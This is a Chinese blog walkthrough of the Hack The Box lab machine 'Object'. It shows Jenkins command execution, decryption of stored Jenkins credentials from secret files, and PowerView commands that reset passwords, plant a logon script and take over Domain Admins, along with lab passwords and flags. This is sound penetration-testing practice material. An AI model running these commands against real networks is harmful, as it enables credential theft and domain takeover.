HTB-oscplike-Object

最新推荐文章于 2024-05-23 10:55:52 发布
最新推荐文章于 2024-05-23 10:55:52 发布
阅读量3.1k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124332653
版权

HTB-oscplike-Object

hard难度的object 靶机IP 10.10.11.132
也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台
这台总共就一百来个人通了

sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132
80/tcp open http Microsoft IIS httpd 10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp open http Jetty 9.4.43.v20210629

两个http 一个winrm
进80看到有一个能点的链接跳转到8080 是一个登陆界面
注册进去可以看到版本号 Jenkins 2.317 searchsploit没有看到版本特别对应的
瞎勾八翻 翻到在创建new item里可以设置build periodically
同时是可以设置执行命令的 设置好出去在console output看到回显

请添加图片描述
但是当我们用来弹shell会发现 “Unable to connect to the remote server”
流量出不来 反弹shell基本寄了 多半就是要通过检索文件获得密码

接下来又是google嗯搜jenkins有用的文件
最后在C:\Users\oliver\AppData\Local\Jenkins.jenkins\users\admin_17207690984073220035 里看到有用的config.xml
里面有
oliver
{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}
然后就是找这个密码是拿什么加密的了 github找了找后发现还需要两个文件
<master.key> <hudson.util.Secret>
这个Secret打开是乱码 需要先base64一下
certutil -encode C:\Users\oliver\AppData\Local\Jenkins.jenkins\secrets\hudson.util.Secret 1.txt
master.key是直接明文的

用这三个文件解出密码 oliver/c1cdfun_d2434 evil-winrm登上去 拿到flag
5ee9729a2ba034facdc9d5e3440f2f9d

进去 whoami /all没东西 netstat -ano看到了经典的88
直接上bloodhound 但是很诡异的失败了
LDAP Connection Test Failed. Check if you’re in a domain context!

搞了半天最后发现是Sharphound的版本问题 换个老版本的就没事了
非常勾八麻烦 老版本的Sharphound还只适配老版本的bloodhound
所以还要下个老版本bloodhound 所以能不升级软件就别升级 恁妈!

请添加图片描述

然后就按他说的 先改smith的密码
$pass = ConvertTo-SecureString ‘oreo123!’ -AsPlainText -Force
Set-DomainUserPassword -Identity smith -AccountPassword $pass
smith也是winrm的用户 拿smith登上去

然后根据genericwrite给的操作是不生效的 改密码什么也不行 很勾八抽象
看了半天 hacktrick上看到可以用让用户在登陆时自动执行脚本 且这里会一直触发
Set-DomainObject -Identity maria -SET @{scriptpath=“xxx.ps1”}
但是问题是一开始就发现这B流量也出不去啊 拿不到shell 陷入僵局

最后是写了个把maria桌面文件写到programdata下的ps1
C:\programdata> echo ‘dir c:\users\maria\desktop > c:\programdata\a.txt’ >s.ps1
Set-DomainObject -Identity maria -SET @{scriptpath=“c:\programdata\s.ps1”}
发现桌面上有一个Engines.xls 再写个ps1把这个copy过来 然后download到kali

xls里面发现了三个密码 随手都试一试最后得到maria/W3llcr4ft3d_4cls
evil-winrm登上去 再看bloodhound 我们可以直接writeowner化身域控了

Set-DomainObjectOwner -Identity ‘Domain Admins’ -OwnerIdentity 'maria’变成owner
Add-DomainObjectAcl -TargetIdentity “Domain Admins” -PrincipalIdentity maria -Rights All 添加全部权限
Add-DomainGroupMember -Identity ‘Domain Admins’ -Members 'maria’添加到组内
然后重登就可以读取root.txt了
de58893c55938e2de1845dc2ec2d6604

这台提权确实费劲 不过域的机器打完了htb会员也刚好到期了
后面两天整理整理这五六十台机器 然后就等订阅时间到打oscp实验室和PG了
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3921
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
oscplike:Kioptix Level 1渗透笔记
fmyyy1的博客
05-31 286
因为靶机都是在内网的,省时间写了个bash脚本利用ping命令快速探测存活主机。不过一般都是用nmap #!/bin/bash if [ $1 == ""] then echo "Usage: ./pingsweep.sh [network]" echo "Example: ./pingsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed
HTB-object
最新发布
2201_75378806的博客
05-23 657
端口扫描将object.htb加入/host文件来到80进行目录爆破fuzz一下子域名wfuzz -u。
HTB-oscplike-Arctic+Grandpa+Silo
m0_53302733的博客
04-07 2011
HTB-oscplike-Arctic+Grandpa+Silo Arctic easy难度的arctic 靶机IP 10.10.10.11 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.11 PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 8500/tcp open fmtp? 49154/tcp open msrpc Micr
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3069
每台都做一做,然后记录在博客里.供自己和大家一起学习.
【Hack The Box】windows练习-- Object
人间体佐菲的博客
11-18 376
【Hack The Box】windows练习-- Object
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
靶机渗透练习40-eLection
hirak0的博客
04-18 972
靶机描述 靶机地址:https://www.vulnhub.com/entry/election-1,503/ Description It is an OSCP-like VM, Medium Level difficulty. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.18 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 Vritu
HTB-oscplike-sense+solidstate+node
m0_53302733的博客
03-30 1743
HTB-oscplike-sense+solidstate+node Sense easy难度的sense 靶机IP 10.10.10.60 nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.60 PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/http lighttpd 1.4.35 dirsearch看到changelog.txt
HTB-oscplike-Bastian+Secnotes
m0_53302733的博客
04-12 2326
HTB-oscplike-Bastian+Secnotes Bastian easy难度的bastion 靶机IP 10.10.10.134 sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc? 139/tcp open netbios-ssn? 445/tcp
HTB-oscplike-Forest
m0_53302733的博客
04-10 2512
HTB-oscplike-Forest easy难度的forest 靶机IP 10.10.10.161 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z) 135/tcp
oscp——HTB——Optimum
王嘟嘟的博客
05-25 518
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
HTB-oscplike-Active+Remote
m0_53302733的博客
04-19 2239
HTB-oscplike-Active+Remote Active NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL
OSCP备战走向巅峰
战神/calmness的博客
01-03 3317
目录 OSCP备战走向巅峰 ——之华丽转身 前言 解题思路 报告注意事项 报告格式 备考内容整理 思维导图 ...
CVE-2023-4016
08-17
- *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值